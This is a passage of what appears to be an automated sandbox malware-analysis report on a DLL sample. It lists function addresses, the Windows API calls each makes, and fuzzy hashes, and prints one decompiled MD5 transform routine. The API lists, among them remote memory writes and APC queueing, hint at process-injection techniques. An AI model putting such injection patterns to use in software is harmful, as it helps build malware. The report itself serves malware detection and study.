                  • Part of subcall function 046E3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                  • Part of subcall function 046E3E7D: SetLastError.KERNEL32(00000000), ref: 046E3EBC
                • GetLastError.KERNEL32(?,00000318,00000008), ref: 046D6441
                  • Part of subcall function 046CECE9: RtlNtStatusToDosError.NTDLL(00000000), ref: 046CED01
                • memcpy.NTDLL(00000218,046E6DD0,00000100,?,00010003,?,?,00000318,00000008), ref: 046D63C0
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046D641A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                • String ID:
                • API String ID: 2966525677-3916222277
                • Opcode ID: 36b73cedeccf207e95e76981cf94d75bb0612ec051a82429cd61f0168c833a04
                • Instruction ID: fa9525d1bdc891873e0614cb84aa7f5d16aa077c61b5d037fed5dac37ba95a46
                • Opcode Fuzzy Hash: 36b73cedeccf207e95e76981cf94d75bb0612ec051a82429cd61f0168c833a04
                • Instruction Fuzzy Hash: 51314F71A01309AFEB20DF65D985AAEB7F8EB18308F10856EE505E7240F774FE458B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E01A5 Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$memcpy
                • String ID:
                • API String ID: 368790112-0
                • Opcode ID: b0deb4d59b893f6d11687a3e0bab061144338cfc3394c2e361e8d84620414ec6
                • Instruction ID: eacde1ca6cf046dd7ced44efa628e3c52a802941616944a55061f86cbdf59f15
                • Opcode Fuzzy Hash: b0deb4d59b893f6d11687a3e0bab061144338cfc3394c2e361e8d84620414ec6
                • Instruction Fuzzy Hash: E2F10430601BA9CFCB31CF6AC5946BABBF0BF52304F244D6DC6D696642E271BA45CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D653E Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,046DE937,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D655E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6573
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D658F
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D65A4
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D65B8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: LibraryLoad$AddressProc
                • String ID:
                • API String ID: 1469910268-0
                • Opcode ID: b7e10f37c4a95d279e25023942cd085b9629edbb303da38dde67d7d6337131d0
                • Instruction ID: a4d1448354cb2643cfd5ae8e475145a0f1c023e6f267af37d2ef996ee3bf3ce0
                • Opcode Fuzzy Hash: b7e10f37c4a95d279e25023942cd085b9629edbb303da38dde67d7d6337131d0
                • Instruction Fuzzy Hash: A9318B32A012129FDB00CF6AE985A9633E9FB49310B41106AE609DF355F77AFC828F45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C3EBE Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                Download Yara Rule
                APIs
                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 046C3F14
                • lstrlenW.KERNEL32(?), ref: 046C3F22
                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 046C3F4D
                • lstrcpyW.KERNEL32(00000006,00000000), ref: 046C3F7A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Query$lstrcpylstrlen
                • String ID:
                • API String ID: 3961825720-0
                • Opcode ID: aca5a819906411dcbc11784674fc32e52472c4f56eb1e4c213a7c66c3906dfb0
                • Instruction ID: 9f673a415da17933a386d070971294a5aaa26b70875d6407a2e9aa5f32c24215
                • Opcode Fuzzy Hash: aca5a819906411dcbc11784674fc32e52472c4f56eb1e4c213a7c66c3906dfb0
                • Instruction Fuzzy Hash: 59414A71500209FFEF11DFA9C984AAEBBB8EF14304F108469F915AB250E775EA519BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CDB44 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                Download Yara Rule
                APIs
                • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,046EE268,00000001), ref: 046CDB68
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDBB3
                  • Part of subcall function 046D9DC6: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,046D2BEA), ref: 046D9DDD
                  • Part of subcall function 046D9DC6: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 046D9DF2
                  • Part of subcall function 046D9DC6: GetLastError.KERNEL32(00000000), ref: 046D9DFD
                  • Part of subcall function 046D9DC6: TerminateThread.KERNEL32(00000000,00000000), ref: 046D9E07
                  • Part of subcall function 046D9DC6: CloseHandle.KERNEL32(00000000), ref: 046D9E0E
                  • Part of subcall function 046D9DC6: SetLastError.KERNEL32(00000000), ref: 046D9E17
                • GetLastError.KERNEL32(046D5628,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDB9B
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDBAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                • String ID:
                • API String ID: 1700061692-0
                • Opcode ID: d3655280b43c988314d8a63007404d1f3d7e692ca0c5866b6665d80428218478
                • Instruction ID: 0f0a5549777d93066c9dde8229dd61cdb75928553e9f3fee7494c13ae8ccad59
                • Opcode Fuzzy Hash: d3655280b43c988314d8a63007404d1f3d7e692ca0c5866b6665d80428218478
                • Instruction Fuzzy Hash: 73F0A4B0345211BFE3A42A7A9CC8E767798DB95334B100239F512C72C0F6651C0289B4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA1FC Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                Download Yara Rule
                APIs
                • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 046DA210
                • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 046DA250
                  • Part of subcall function 046D70AC: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,046D63FB,00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 046D70CA
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046DA259
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                • String ID:
                • API String ID: 4036914670-0
                • Opcode ID: 046dcf4066738aba0fa3acf0c5d8a684dee257f21d836c043e0f4ef4e72b349f
                • Instruction ID: 5fdb377a45ca76ae3dc46863b91a52eb4dc21d899ed51bdb4c31e95bfdc5c0b2
                • Opcode Fuzzy Hash: 046dcf4066738aba0fa3acf0c5d8a684dee257f21d836c043e0f4ef4e72b349f
                • Instruction Fuzzy Hash: E801E475A04108FEEB11AEE6DC45EAEBBBDEB88700F040029FA01E6155F775E9019B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2588 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                Download Yara Rule
                APIs
                • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 046E25B9
                • RtlNtStatusToDosError.NTDLL(C000009A), ref: 046E25F0
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFreeHeapInformationQueryStatusSystem
                • String ID:
                • API String ID: 2533303245-0
                • Opcode ID: 6107da1662317ee4495f403f891acbf35d2757354d27cc9b5209bc654e349518
                • Instruction ID: e15f7c6c755e81255f1a372cc12ba4f4aeeb05d831322f59784e66e694d0b178
                • Opcode Fuzzy Hash: 6107da1662317ee4495f403f891acbf35d2757354d27cc9b5209bc654e349518
                • Instruction Fuzzy Hash: 61012632903120AFD7215B56CE38ABFBAAEDF95B51F020058ED01A7200FB70AE0186E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DF0CC Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046DF0EB
                • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 046DF103
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: InformationProcessQuerymemset
                • String ID:
                • API String ID: 2040988606-0
                • Opcode ID: 8136a7eafff47edbf71fbfc8925fe417f4fba8219174408e558e10ad300412c6
                • Instruction ID: dc7df9785d7327bf84a9f938586a68f2a623d86d2346e6799ab436c6737bc462
                • Opcode Fuzzy Hash: 8136a7eafff47edbf71fbfc8925fe417f4fba8219174408e558e10ad300412c6
                • Instruction Fuzzy Hash: 03F0687194025C7AEB10EB91CC05FDE7BBCEB04740F004064EE05E6181E370EB558BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D595B Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 046D5988
                • SetLastError.KERNEL32(00000000,?,046D4C11,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 046D598F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$LastStatus
                • String ID:
                • API String ID: 4076355890-0
                • Opcode ID: 78fa53dc5654f3ca7dda1a3ad5ce7eef60e06d6c0e5867249780fbfab94b9d3e
                • Instruction ID: f16433a673a40b59ad991ac05ff64f44332cfb984d59a86224c212203c78a595
                • Opcode Fuzzy Hash: 78fa53dc5654f3ca7dda1a3ad5ce7eef60e06d6c0e5867249780fbfab94b9d3e
                • Instruction Fuzzy Hash: 21E0123260015ABFCF015FD59C04D9A7F99EB08750B005010BA01DB120E635DC61ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C68B2 Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046C6C8A
                • memset.NTDLL ref: 046C6C99
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C12
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C1E
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C49
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: b141997f1875c5d536a83d4a0f07464cfa1e4f11872701ed3972f755f0e405b5
                • Instruction ID: 14ae1eb1638fde5eaef418aa114d949849bab94a9370147274b3541417848085
                • Opcode Fuzzy Hash: b141997f1875c5d536a83d4a0f07464cfa1e4f11872701ed3972f755f0e405b5
                • Instruction Fuzzy Hash: B0021070601B618FCB75CF29C680566BBF1FF547147609E2ED6E786A90E231F881CB18
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1436E Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 50%
                			E01C1436E(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                0x01c14371
                0x01c1437c
                0x01c1437f
                0x01c14382
                0x01c14383
                0x01c14383
                0x01c1438e
                0x01c1439f
                0x01c143a1
                0x01c143a4
                0x01c143a4
                0x01c143a7
                0x01c143a7
                0x01c143aa
                0x01c143aa
                0x01c143ad
                0x01c143ad
                0x01c143ca
                0x01c143cd
                0x01c143e3
                0x01c143e6
                0x01c14400
                0x01c14403
                0x01c14419
                0x01c1441c
                0x01c1441e
                0x01c14436
                0x01c14439
                0x01c1443c
                0x01c14454
                0x01c14457
                0x01c14471
                0x01c14474
                0x01c1448a
                0x01c1448d
                0x01c1448f
                0x01c144a7
                0x01c144ac
                0x01c144af
                0x01c144c5
                0x01c144c8
                0x01c144e2
                0x01c144e5
                0x01c144fb
                0x01c144fe
                0x01c14500
                0x01c1451b
                0x01c1451e
                0x01c14535
                0x01c14538
                0x01c1453c
                0x01c14555
                0x01c14558
                0x01c1455a
                0x01c1455d
                0x01c14578
                0x01c1457b
                0x01c14594
                0x01c14597
                0x01c145a7
                0x01c145aa
                0x01c145c2
                0x01c145c5
                0x01c145df
                0x01c145e2
                0x01c145fa
                0x01c145fd
                0x01c14613
                0x01c14616
                0x01c1462e
                0x01c14631
                0x01c14649
                0x01c1464c
                0x01c14666
                0x01c14669
                0x01c1467f
                0x01c14682
                0x01c1469a
                0x01c1469d
                0x01c146b7
                0x01c146ba
                0x01c146d2
                0x01c146d5
                0x01c146eb
                0x01c146ee
                0x01c14706
                0x01c14709
                0x01c14721
                0x01c14724
                0x01c14736
                0x01c14739
                0x01c1474b
                0x01c1474e
                0x01c14760
                0x01c14763
                0x01c14767
                0x01c14777
                0x01c1477a
                0x01c14788
                0x01c1478b
                0x01c1479d
                0x01c147a0
                0x01c147b4
                0x01c147b7
                0x01c147b9
                0x01c147c9
                0x01c147cc
                0x01c147de
                0x01c147e1
                0x01c147ef
                0x01c147f2
                0x01c14804
                0x01c14807
                0x01c1480b
                0x01c1481b
                0x01c1481e
                0x01c14830
                0x01c14833
                0x01c14841
                0x01c14844
                0x01c14856
                0x01c14859
                0x01c1486b
                0x01c1486e
                0x01c14882
                0x01c14885
                0x01c14899
                0x01c1489c
                0x01c148b0
                0x01c148b3
                0x01c148c7
                0x01c148ca
                0x01c148de
                0x01c148e1
                0x01c148f5
                0x01c148fa
                0x01c1490c
                0x01c1490f
                0x01c14923
                0x01c14926
                0x01c1493a
                0x01c1493d
                0x01c14953
                0x01c14956
                0x01c1496a
                0x01c1496d
                0x01c1497f
                0x01c14982
                0x01c14996
                0x01c14999
                0x01c149ad
                0x01c149b0
                0x01c149c4
                0x01c149cd
                0x01c149d0
                0x01c149d9
                0x01c149e2
                0x01c149ea
                0x01c149f2
                0x01c149fc
                0x01c14a11

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 975b50852a7db70ec818c36c2022680df3a2678fc47ff7de6eecce9a235c2820
                • Instruction ID: 1a982a666264736c7f7448461ebb4c0145969ef4123e8fc268377d7a7eced9d6
                • Opcode Fuzzy Hash: 975b50852a7db70ec818c36c2022680df3a2678fc47ff7de6eecce9a235c2820
                • Instruction Fuzzy Hash: 8C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D2CB8 Relevance: 1.9, APIs: 1, Instructions: 610COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 264a606b35063c7ea33b62417bfac11855558322b448b55edcca933e797433aa
                • Instruction ID: 9059dad05260b3d11991157d88ebf3fb4bf60b980633bc6d8101c4539272f0e5
